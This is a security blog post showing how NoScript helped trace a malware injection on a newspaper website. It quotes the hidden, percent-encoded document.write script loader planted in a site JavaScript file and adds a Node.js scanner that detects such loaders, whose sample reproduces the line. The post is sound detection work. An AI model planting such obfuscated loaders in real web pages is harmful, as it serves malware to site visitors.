Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

NoScript Helps Reveal Website Exploits – Telegram .com Case

   13 May 09   Filed in Tips and Tricks

FireFox + NoScript

Screenshot: NoScript

I usually suggest using Firefox with the NoScript extension for safer web browsing. This combination will save you from most web threats. Just remember one rule: never use the “Allow this page” or “Allow Scripts Globally” options.

NoScript reveals website exploits

NoScript is also a great helper in revealing tricky website exploits.

Let me use the “Telegram .com” case to show how I use it.

Telegram .com is the website of a Worcester, MA newspaper. Google currently lists this site as suspicious, and many browsers (Firefox 3, Safari, Google Chrome) display a warning when you visit it.

Google’s Safe-Browsing diagnostic page says:

Malicious software is hosted on 3 domain(s), including baidubadu .com/, tibetanpic .com/, dsaff .com/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including xxyou .net/.

I usually start my investigations with Unmask Parasites. It is the fastest and safest way to detect many types of website security issues. This time, however, the report only stated that Google had listed the site as suspicious.

The next step was to load the site in Firefox (on a Linux machine, to minimize security risks) and check the NoScript menu, which lists the external domains whose scripts the page tries to load. There were quite a few domains in the menu, but none of them resembled the sites mentioned on Google's diagnostic page.

It was time to enable telegram .com in the NoScript menu. I clicked “Temporarily allow telegram .com”. When the page reloaded, I right-clicked the NoScript icon and found a new suspicious entry in the menu: “Allow http: //%78%78%79%6F%75%2E%6E%65%74”.

Screenshot: Telegram.com - NoScript menu with the xxyou .net item

I decoded this percent-encoded URL: %78%78%79%6F%75%2E%6E%65%74 = xxyou .net (each %XX is the hex code of one ASCII character; the encoding hides the domain name from a casual look at the source).

Bingo! This is the site mentioned as an intermediary on Google's diagnostic page.

The fact that this domain appeared only after enabling scripts on telegram .com means that the “xxyou .net” reference was hidden somewhere in the .js files served by the telegram .com web server: NoScript only lists a script source once something on the page actually tries to load it, and that something was itself a script.

I downloaded the site's .js files with wget. Sure enough, at the very bottom of the “/assets/AC_RunActiveContent.js” file I discovered the following code:

document.write('<script src=http: //%78%78%79%6F%75%2E%6E%65%74 /msn.gif></script>');
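Note that the injected src ends in .gif, but a script tag executes whatever the server returns, so the extension tells you nothing. As an added example that is not part of the original post, here is a small Node.js script that automates the two manual steps above: it scans downloaded .js files for document.write() calls that inject a script tag, and percent-decodes the hostname the same way the NoScript menu entry was decoded by hand. The sample input is constructed for the example (a stand-in for the Adobe loader code followed by the injected line from the post); the function names are my own.

```javascript
// Added example (not from the original post): find document.write()-injected
// <script src=...> loaders in a JavaScript file and decode percent-encoded hosts.
// Run with: node scan.js

// Decode %XX escapes; return null if the string is not valid percent-encoding
// (decodeURIComponent throws a URIError on malformed sequences such as "%ZZ").
function percentDecode(s) {
  try {
    return decodeURIComponent(s);
  } catch (e) {
    return null;
  }
}

// Extract the host part of a URL; accepts "http://host/path" and "//host/path".
function hostOf(url) {
  const m = /^(?:[a-z]+:)?\/\/([^\/?#]+)/i.exec(url.trim());
  return m ? m[1] : null;
}

// Find document.write(...) calls whose string argument contains a <script src=...>
// tag. Returns one finding per src: the raw src, the decoded host, and whether
// the host was percent-encoded (a strong sign of deliberate obfuscation).
function findInjectedScripts(jsSource) {
  const findings = [];
  const callRe = /document\.write\s*\(\s*(['"])([\s\S]*?)\1\s*\)/gi;
  let call;
  while ((call = callRe.exec(jsSource)) !== null) {
    const html = call[2];
    // src may be quoted or bare, as in the telegram .com snippet
    const srcRe = /<script[^>]*\bsrc\s*=\s*(?:(['"])([^'"]*)\1|([^\s>]+))/gi;
    let tag;
    while ((tag = srcRe.exec(html)) !== null) {
      const rawSrc = tag[2] !== undefined ? tag[2] : tag[3];
      const rawHost = hostOf(rawSrc);
      const host = rawHost === null ? null : percentDecode(rawHost);
      findings.push({
        rawSrc,
        host,
        percentEncoded: rawHost !== null && host !== null && rawHost !== host,
      });
    }
  }
  return findings;
}

// Human-readable lines, one per finding.
function report(jsSource) {
  return findInjectedScripts(jsSource).map(
    (f) => `${f.percentEncoded ? "OBFUSCATED " : ""}script loader -> ${f.host} (${f.rawSrc})`
  );
}

// Constructed sample: a placeholder for the legitimate loader code, followed by
// the injected line quoted in the post (hostname reproduced from the post).
const SAMPLE_JS = [
  "function AC_FL_RunContent() { /* legitimate loader code would be here */ }",
  "document.write('<script src=http://%78%78%79%6F%75%2E%6E%65%74/msn.gif></script>');",
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  // Real use: node scan.js < downloaded.js, or pass the file contents in here.
  for (const line of report(SAMPLE_JS)) console.log(line);
}
```

The percent-encoded check is the useful signal: legitimate loaders have no reason to encode a plain ASCII hostname, so any src whose host changes under decoding deserves a look before the rest of the file is read.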

I hope that, despite this hack, Telegram .com has decent webmasters and sysadmins who will figure out how their site was infected and prevent any recurrence. This article is about detection only. (Update: after posting this article, I checked the site again and the malicious script was gone.)

As you can see, NoScript helped reveal the exploit. At the same time it kept protecting me even after I enabled JavaScript on telegram .com, since the other external scripts, including the one from xxyou .net, were still blocked.

Want to share your tricks?

If you know any other NoScript tricks, please share them in the comments section below. If you have any other security related tips and tricks, and want to share them with readers of my blog, you can contact me and offer a guest post.
